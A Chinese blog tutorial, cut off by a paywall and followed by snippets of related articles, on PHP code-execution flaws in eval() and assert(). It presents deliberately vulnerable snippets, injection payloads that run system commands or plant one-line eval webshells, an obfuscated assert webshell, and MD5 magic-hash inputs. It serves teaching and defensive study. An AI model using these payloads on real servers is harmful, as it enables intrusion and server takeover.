PHP代码执行漏洞总结大全

已于 2022-02-15 15:52:44 修改
阅读量1.1w 收藏 100
点赞数 13
分类专栏: 信息安全 文章标签: php
于 2021-10-11 21:40:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45719288/article/details/120683733
版权
本文详细介绍了PHP代码执行漏洞的原因及常见的漏洞函数,包括eval(), assert(), preg_replace()+/e模式, create_function(), array_map()等,并通过实例演示了漏洞利用方式,提醒开发者注意代码安全。" 51181121,5076837,Python实现公平的可重入读写锁,"['Python', '多线程', '读写锁']
摘要由CSDN通过智能技术生成

目录

一、 漏洞产生的原因

PHP脚本语言简洁,方便,但也与此同时伴随着一些问题,例如速度慢,无法解除系统底层等等。在web程序中,有时候程序员为了代码的灵活性与简洁性,会适当调用代码执行的函数执行。但由于没有充分考虑到用户是否会使用与控制,最终导致web应用存在代码执行漏洞。

二、 漏洞产生的常见函数

2.1 eval()

eval(phpcode)

eval() —— 把字符串按照 PHP 代码来计算。

(1) 直接利用漏洞源码:

<?php
$data = $_GET['data'];
eval("\$ret = $data;");
echo $ret;
?>

漏洞利用:?data=phpinfo()

(2)闭合绕过

- 例子1:

<?php
$data = $_GET['data'];
eval("\$ret = \"$data\";");
echo $ret;
?>

漏洞利用:

  1. ?data=";phpinfo();")//
  2. ?data=${phpinfo()}(php版本5.5及以上)
  3. ?data=");@eval($_POST[x]);//

- 例子2:

<?php
$data = $_GET['data'];
eval("\$ret = strtolower('$data');");
?>

漏洞利用:

  1. ?data=’);phpinfo();//
  2. ?data=’);$cmd=shell_exec(‘systeminfo’);echo “<pre>{$cmd}</pre>”;//
    在这里插入图片描述

- 例子3:

<?php
$data = $_GET['data'];
eval("\$ret = strtolower(\"$data\");");
?>

漏洞利用:

  1. ?data=");phpinfo();//
  2. ?data=${phpinfo()}(php版本5.5及以上)
  3. ?data=${@eval($_POST[x])}

2.2 assert()

assert — 检查一个断言是否为 false
ps: assert($a)只能单行执行

- 例子1:

<?php
$aaa = "abbbsbbsbbebbrbbt"; 
$ccc = str_replace('b','',$aaa); ///$ccc="assert"
$ccc($_POST[1]);

漏洞利用:

  1. POST方法 1=phpinfo();
  2. 菜刀连接

- 例子2:
利用assert写木马
服务器代码:


                

                
                
        

        

    




        

            

                    
                      最低0.47元/天 解锁文章
                        
                    
            

        

    

      

        

            

              
                
                  LJW_IIE
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    13
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    100
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
PHP 函数漏洞总结

				
			

			

				

					wuyouxiaoli的博客
				

				

					02-17
					
					296
					
				

			

		

		

			
				
1.MD5 compare漏洞

PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。
常见的payload有


0x01md5(str)
QNKCDZO
240610708
s878926199a
s155964671a
s214587387a
s214587387asha1(st...

			
		

	



                

              
                



	

		

			

				
					
PHP代码执行漏洞总结

				
			

			

				

					Jtype的专栏
				

				

					08-11
					
					768
					
				

			

		

		

			
				
代码执行函数PHP中可以执行代码的函数。如eval()、assert()、“、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec() 等demo code 1.1:echo `dir`;?>二 文件包含代码注射文件包含函数在特定条件下的代码注射,如include()、inclu

			
		

	



                


  
              

                


	

		

			

				
					
【网络安全零基础入门必知必会】之PHP远程命令执行代码执行原理利用与常见绕过总结3

					
最新发布

				
			

			

				

					Libra1313的博客
				

				

					07-22
					
					598
					
				

			

		

		

			
				
相较于SQL注入漏洞,远程命令执行更加少见。由于是直接执行系统命令,所以相较于前者此漏洞会更加危险:攻击者通过远程命令执行漏洞可以直接掌控服务器攻击者可以通过存在此漏洞的服务器作为跳板,进而攻击内网或外网中的其他服务器。

			
		

	





	

		

			

				
					
PHP常见漏洞的防范措施

				
			

			

				

					大鹏
				

				

					12-18
					
					2073
					
				

			

		

		

			
				
一、常见PHP网站安全漏洞

对于PHP漏洞,目前常见的漏洞有五种。分别是Session文件漏洞、SQL注入漏洞、脚本命令执行漏洞、全局变量漏洞和文件漏洞。这里分别对这些漏洞进行简要的介绍。

1、session文件漏洞

Session攻击是黑客最常用到的攻击手段之一。当一个用户访问某一个网站时,为了免客户每进人一个页面都要输人账号和密码,PHP设置了Session和Cookie用

			
		

	



		

			
		



	

		

			

				
					
php漏洞代码审计

				
			

			

				

					anjuzi的专栏
				

				

					06-06
					
					582
					
				

			

		

		

			
				
在甲方公司做代码审计一般还是以白盒为主,漏洞无非这么几类,XSS、sql注入、命令执行、上传漏洞、本地包含、远程包含、权限绕过、信息泄露等。


1.xss + sql注入


其中占大头的自然是XSS与SQL注入,对于框架类型或者有公共文件的,建议在公共文件中统一做一次XSS和SQL注入的过滤。写个过滤函数,可由如下所示:


$_REQUEST = filter_xss($_

			
		

	





	

		

			

				
					
常见的 php 漏洞

				
			

			

				

					国内某知名游戏公司小菜鸡工程师
				

				

					11-19
					
					1万+
					
				

			

		

		

			
				
关注漏洞,关注网络安全

			
		

	





	

		

			

				
					
wordpress php执行代码_【漏洞通告】PHP远程代码执行漏洞(CVE-2019-11043)

				
			

			

				

					weixin_39742568的博客
				

				

					11-23
					
					148
					
				

			

		

		

			
				
1.综述2019年9月14日至18举办的 Real World CTF中,国外安全研究员 Andrew Danau 在解决一道CTF题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。2019年9月26日,PHP官方发布漏洞通告,其中指出:使用 Nginx + php-fpm的服务器,在部分配置下,存在远程代码执行漏洞.且该配置已被广泛使用,危害较大,影响较为广泛。...

			
		

	





	

		

			

				
					
【愚公系列】2024年03月 《CTF实战:从入门到提升》 010-Web安全入门(PHP代码执行漏洞

					
热门推荐

				
			

			

				

					时光隧道
				

				

					03-28
					
					5万+
					
				

			

		

		

			
				
PHP代码执行漏洞是一种常见的安全漏洞,也被称为远程代码执行(Remote Code Execution,RCE)漏洞。这种漏洞的发生通常是由于程序员在编写代码时未正确过滤用户输入,导致用户能够将恶意代码插入到应用程序中,然后被解释器执行。攻击者可以利用这种漏洞执行任意代码,从而获取系统权限、窃取数据或者对系统进行进一步的攻击。未过滤用户输入:开发者在使用用户输入时必须进行严格的输入验证和过滤,避免直接将用户输入作为代码执行。eval() 和 exec() 函数。

			
		

	





	

		

			

				
					
ThinkPHP 5.0 远程代码执行漏洞分析

				
			

			

				

					02-21
				

			

		

		

			
				
### ThinkPHP 5.0 远程代码执行漏洞分析  #### 漏洞背景与概述  ThinkPHP是一款广泛使用的PHP框架,它提供了丰富的功能和良好的性能。然而,如同任何复杂的软件系统一样,它也存在安全漏洞。本次分析的焦点集中在...

			
		

	





	

		

			

				
					
php漏洞大全

				
			

			

				

					03-09
				

			

		

		

			
				
PHP网页的安全性问题
  针对PHP的网站主要存在下面几种攻击方式:
  1.命令注入(Command Injection)
  2.eval注入(Eval Injection)
  3.客户端脚本攻击(script Insertion)
  4.跨网站脚本攻击(Cross Site scripting, XSS)
  5.SQL注入攻击(SQL injection)
  6.跨网站请求伪造攻击(Cross Site Request Forgeries, CSRF)
  7.Session 会话劫持(Session Hijacking)
  8.Session 固定攻击(Session Fixation)
  9.HTTP响应拆分攻击(HTTP Response Splitting)
  10.文件上传漏洞(File Upload Attack)
  11.目录穿越漏洞(Directory Traversal)
  12.远程文件包含攻击(Remote Inclusion)
  13.动态函数注入攻击(Dynamic Variable Evaluation)
  14.URL攻击(URL attack)
  15.表单提交欺骗攻击(Spoofed Form Submissions)
  16.HTTP请求欺骗攻击(Spoofed HTTP Requests)
  几个重要的php.ini选项

			
		

	





	

		

			

				
					
ThinkPHP框架任意代码执行漏洞的利用及其修复方法

				
			

			

				

					10-25
				

			

		

		

			
				
不过,正如所有软件产品一样,ThinkPHP也存在安全漏洞的风险,其中就包括了任意代码执行漏洞。这种漏洞允许攻击者在服务器上执行恶意代码,从而威胁系统的安全性和数据的完整性。了解到漏洞的危害和如何修复这些漏洞...

			
		

	





	

		

			

				
					
php漏洞

				
			

			

				

					
				

				

					12-12
					
					637
					
				

			

		

		

			
				
从现在的网络安全来看,大家最关注和接触最多的WEB页面漏洞应该是ASP了,在这方面,小竹是专家,我没发言权.然而在PHP方面来看,也同样存在
很严重的安全问题,但是这方面的文章却不多.在这里,就跟大家来稍微的讨论一下PHP页面的相关漏洞吧.
    我对目前常见的PHP漏洞做了一下总结,大致分为以下几种包含文件漏洞,脚本命令执行漏洞,文件泄露漏洞,SQL注入漏洞等几种.当然,至于
COOKI

			
		

	





	

		

			

				
					
php定时执行代码漏洞_常见的PHP代码执行漏洞

				
			

			

				

					weixin_35812176的博客
				

				

					01-14
					
					231
					
				

			

		

		

			
				
1. 代码执行函数PHP中可以执行代码的函数。如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec() 等demo code 1.1:echo `dir`;?>2. 文件包含代码注射文件包含函数在特定条件下的代码注射,如include()、include_once()、...

			
		

	





	

		

			

				
					
php常见漏洞

				
			

			

				

					qq_36232967的博客
				

				

					06-20
					
					502
					
				

			

		

		

			
				
此外,及时更新和修复依赖组件和框架也是保持应用程序安全的关键。会话劫持和固定:会话劫持是指攻击者窃取有效用户会话标识符,然后冒充合法用户访问系统。会话固定是指攻击者在不合法获取会话标识符的情况下,通过伪造会话标识符欺骗服务器信任他们。文件包含漏洞:文件包含漏洞出现在代码中使用用户可控参数来加载外部文件的情况下,攻击者可以通过构造恶意路径或文件名来加载任意文件并执行其中的代码,从而导致服务器被入侵。跨站脚本攻击(XSS):XSS 漏洞是指攻击者通过在网页中注入恶意脚本,从而在用户浏览器中执行恶意代码

			
		

	





	

		

			

				
					
PHP函数漏洞总结

				
			

			

				

					柠檬木有枝
				

				

					08-26
					
					2926
					
				

			

		

		

			
				
前言
本文主要针对 PHP 函数相关的漏洞总结,可能会偏向 CTF 方面,内容肯定不全,有空的话会持续更新,欢迎各位表哥补充以及对文章错误之处进行斧正!
1 弱类型安全问题
1.1 == 弱类型比较缺陷
=== 在进行比较的时候,会先判断两种字符串的类型是否相等,再比较
== 在进行比较的时候,会先将字符串类型转化成相同,再比较
(1)字符串的开始部分决定了它的值,如果该字符串以合法的数值开始,则使用该数值,否则其值则为0
var_dump("admin"==0); //true
var_dump("1a

			
		

	





	

		

			

				
					
php代码执行漏洞

				
			

			

				

					andiao1218的博客
				

				

					12-02
					
					110
					
				

			

		

		

			
				
php代码执行的两个函数eval(),assert()

<?php
	$i = $_GET['x'];
	eval($i);
?>


eval()函数将以php类型执行传入的参数x的值
给x传入一个phpinfo();,执行

给x传入一个php一句话代码,http://localhost/test/eval/eval.php?x=eval($_...

			
		

	





	

		

			

				
					
PHP代码执行漏洞

				
			

			

				

					笑花大王
				

				

					02-03
					
					411
					
				

			

		

		

			
				
前言

最近的日子简简单单 早上起来健身+散打来一套 看看电视剧学习学习吃吃饭一天就结束了emmmm太快了一天 所以要更加努力!更加勤奋!
PHP代码执行漏洞
有的应用程序中提供了一些可以将字符串作为代码执行的函数,例如PHP中的eval函数,可以将改函数的参数当做PHP代码执行。如果对这些函数的参数控制不严格,就可能会被攻击者利用,执行恶意代码
1.eval函数
eval函数把...

			
		

	





	

		

			

				
					
php漏洞eval,Web安全之代码执行漏洞

				
			

			

				

					05-16
				

			

		

		

			
				
PHP 中的 eval 函数是一个非常强大的函数,可以执行任何字符串参数。但是,这也使得它成为了被黑客利用的一个漏洞点。

当 PHP 程序中的用户输入被传递到 eval 函数中时,如果黑客能够控制这个输入,他们就可以在服务器上执行任意代码,这就是被称为代码执行漏洞的安全问题。

例如,以下代码可能会存在代码执行漏洞:

```php
<?php
eval($_GET['code']);
?>
```

如果黑客能够通过 URL 参数 code 传递一些恶意代码,那么这些代码将被执行,从而导致安全问题。

为了避免代码执行漏洞,应当避免使用 eval 函数,或者对用户输入进行充分的过滤和验证,确保只有安全的输入才会被传递到 eval 函数中。同时,应当及时更新 PHP 版本,以防止已知的漏洞被利用。

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值